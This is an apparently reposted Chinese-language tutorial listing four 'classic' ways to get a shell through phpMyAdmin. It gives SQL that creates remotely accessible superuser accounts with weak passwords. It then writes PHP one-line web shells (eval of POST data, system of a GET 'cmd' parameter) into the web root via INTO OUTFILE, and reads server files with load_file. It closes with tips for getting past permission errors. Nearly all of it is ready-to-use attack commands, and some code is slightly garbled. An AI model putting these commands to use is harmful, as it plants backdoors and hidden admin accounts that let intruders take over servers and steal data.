共計 1807 個字符，預計需要花費 5 分鐘才能閱讀完成。

自動寫代碼機器人，免費開通

這篇文章將為大家詳細講解有關 PHPmyadmin 拿 shell 的方法有哪些，丸趣 TV 小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

PHPmyadmin 修改用戶密碼

直接點擊上面的 localhost 或者 1270.0.1，出現用戶一欄，點擊修改即可

添加超級用戶 guetsec 密碼 ooxx 并且允許外連

GRANT ALL PRIVILEGES ON *.* TO  guetsec @ %  IDENTIFIED BY  ooxx  WITH GRANT OPTION;

我們可以創建 root 賬戶設置密碼

GRANT ALL PRIVILEGES ON *.* TO  root @ %  IDENTIFIED BY  123456  WITH GRANT OPTION;

這樣就創建了 root 外聯賬戶，密碼 123456，外鏈時用 123456

拿 shell 四種經典方法：

方法一：

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (?php @eval_r($_POST[7on])? 
SELECT 7onFROM study INTO OUTFILE  E:/wamp/www/7.php 
---- 以上同時執行，在數據庫: mysql  下創建一個表名為：study，字段為 7on，導出到 E:/wamp/www/7.php
  一句話連接密碼：7on

方法二：

 讀取文件內容： select load_file( E:/xamp/www/s.php 
寫一句話： select  ?php @eval_r($_POST[cmd])? INTO OUTFILE  E:/xamp/www/study.php 
cmd 執行權限： select  ?php echo \ pre \ system($_GET[\ cmd\  echo \ /pre \  ?  INTO OUTFILE  E:/xamp/www/study.php

方法三：

JhackJ 版本 PHPmyadmin 拿 shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(?php eval_r($_POST[cmd])? 
select cmd from study into outfile  E:/wamp/www/7.php 
 
Drop TABLE IF EXISTS study;
 
 ?php eval_r($_POST[cmd])? 
--------------------------------------------------------------------------------
 ?php @eval_r($_POST[cmd])? 
 
CREATE TABLE study(cmd text NOT NULL );# MySQL  返回的查詢結果為空 (即零行)。INSERT INTO study( cmd ) VALUES (?php eval_r($_POST[cmd])? #  影響列數： 1
SELECT cmdFROM study INTO OUTFILE  E:/wamp/www/7.php #  影響列數： 1
DROP TABLE IF EXISTS study;# MySQL  返回的查詢結果為空 (即零行)。

方法四：

select load_file( E:/xamp/www/study.php 
select  ?php echo \ pre \ system($_GET[\ cmd\  echo \ /pre \  ?  INTO OUTFILE  E:/xamp/www/study.php

然后訪問網站目錄：http://www.2cto.com/study.php?cmd=dir

Phpmyadmin 導出一句話時出現 (Errcode: 13 – Permission denied)

是對此目錄沒有權限，可以試試上級目錄，或者下級目錄

再不行試試 NTS 引流

還有就是注意目錄 \

關于“PHPmyadmin 拿 shell 的方法有哪些”這篇文章就分享到這里了，希望以上內容可以對大家有一定的幫助，使各位可以學到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。

向 AI 問一下細節